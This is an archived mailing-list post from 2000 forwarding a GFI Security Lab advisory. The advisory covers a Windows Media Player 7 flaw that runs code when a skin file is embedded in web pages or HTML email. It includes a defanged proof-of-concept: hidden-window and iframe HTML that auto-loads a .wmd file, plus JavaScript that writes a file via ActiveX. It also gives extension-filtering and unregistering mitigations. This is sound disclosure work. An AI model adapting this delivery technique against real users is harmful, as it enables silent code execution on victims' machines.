[Esa-l] [ GFISEC23112000 ] Microsoft Media Player 7 allows executation of
Arbitrary Code (fwd)
John D. Hardin
jhardin at wolfenet.com
Sun Nov 26 12:10:54 PST 2000
Please add "asx|wm[szd]" to your custom MANGLE_EXTENSIONS list. You
may also choose to poison:
*.asx
*.wms
*.wmz
*.wmd
Note that the attack described below is prevented by defanging active
HTML, not through attachment poisoning. The above recommendations are
proactive to prevent "social engineering" attacks.
See also:
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
--
John Hardin KA7OHZ ICQ#15735746 http://www.wolfenet.com/~jhardin/
jhardin at wolfenet.com pgpk -a finger://gonzo.wolfenet.com/jhardin
768: 0x41EA94F5 - A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
1024: 0xB8732E79 - 2D8C 34F4 6411 F507 136C AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
"Bother," said Pooh as he struggled with /etc/sendmail.cf, "it never
does quite what I want. I wish Christopher Robin was here."
-- Peter da Silva in a.s.r
-----------------------------------------------------------------------
Today: we know who is President
---------- Forwarded message ----------
Date: Thu, 23 Nov 2000 12:11:49 +0100
From: Sandro Gauci <Sandro at GFI.COM>
To: NTBUGTRAQ at LISTSERV.NTBUGTRAQ.COM
Subject: [ GFISEC23112000 ] Microsoft Media Player 7 allows executation of Arbitrary Code
GFI Security Lab Advisory
http://www.gfi.com/
----[Title:
[ GFISEC23112000 ] Microsoft Media Player 7 allows executation of
Arbitrary Code
----[Published:
23.NOV.2000
----[Vendor Status:
Microsoft has been informed and we have worked with them to release
a patch.
----[Systems Affected:
Windows ME (WMP7 is installed by default)
and 95,98 NT and 2000, using:
* Windows Media Player 7
and
* Internet Explorer 3+,
* Outlook Express 2000,
* Outlook Express 98,
* Outlook 2000,
* Outlook 98
* possibly all other HTML and/or
javascript enabled e-mail clients.
----[The problem:
GFI, developer of email content checking & network
security software, has recently discovered a security flaw
within Windows Media Player which allows a malicious user
to run arbitary code on a target machine as it attempts to
view a website or an HTML E-mail.
The problem is exploited by embedding a javascript (.js) file within a
Media Player skin file (.wmz) which can also be embeded in a Windows Media
Download file (.wmd). This does not require the user to run any attachments
since the Media Player file is automatically executed using a iframe tag
or a window.open() with in a <DEFANGED_script> tag.
----[Proof of concept Exploit:
<DEFANGED_Embedded within an HTML file or e-mail>
E-mail Example 1.
<head>
<DEFANGED_script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
alert('This exploit will now open a new window\n
and automatically download the wmd file\n
and execute it. This will create a file named\n
gfiseclab.txt in your C:\\');
window.open(theURL,winName,features);
}
//-->
</script>
</head>
<body bgcolor="#FFFFFF"
DEFANGED_OnLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</Embedded within an HTML e-mail>
E-mail Example 2.
<html>
<body>
<DEFANGED_script>
alert('This exploit will now open a new window \n and automatically download
the wmd file \n
and execute it. This will create a file named \n gfiseclab.txt in your
C:\\')</script>
<DEFANGED_iframe src="http://website/test.wmd"></iframe></body>
</html>
-------------------------------------
test.wmd is a compressed zip file which contains the following files:
* test.asx: meta file which points to an mpg file and
the exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.
test.wmz is also a compressed zip file containing:
* test.js: our javascript which contains the following code
************************************
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload(){
playAgain();
}
************************************
* test.wms: another metafile which calls test.js
-------------------------------------
----[Solution:
For e-mail the best solution is to apply filtering on incoming e-mails via
the SMTP server to filter WMD and WMZ files, disable javascript iframe tags,
meta refresh tags and possibly ActiveX tags. This means that users should
not worry about receiving malicious email and spreading worms etc.
Consider unregistering .wmd and .wmz so from being associated with Media
Player 7 until a vendor patch is applied. Procedure:
In Windows Explorer click on View>Options>File Types and delete the
following entries:
* Windows Media Player Skin Package.
* Windows Media Player Download Package.
This should provide some better protection.
----[Reference:
http://www.gfi.com/press/memp7exploitpr.htm
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
----[Contact Information:
Sandro Gauci
GFI Security Lab
sandro at gfi.com
http://www.gfi.com
GFI - Security & communications products for Windows NT/2000
http://www.gfi.com
**********************************************************
This mail was content checked for malicious code or viruses
by Mail essentials. Mail essentials for Exchange/SMTP is an
email security, content checking & anti-virus gateway that
removes all types of email-borne threats before they can affect
your email users. Spam, viruses, dangerous attachments & offensive
content can be removed before they reach your mail server.
In addition it has server-based email encryption, disclaimers
and other email features.
***********************************************************
In addition to Mail essentials, GFI also produces the FAXmaker
fax server product range & LANguard internet access control &
intrusion detection. For more information on our products please
visit http://www.gfi.com
More information about the esd-l
mailing list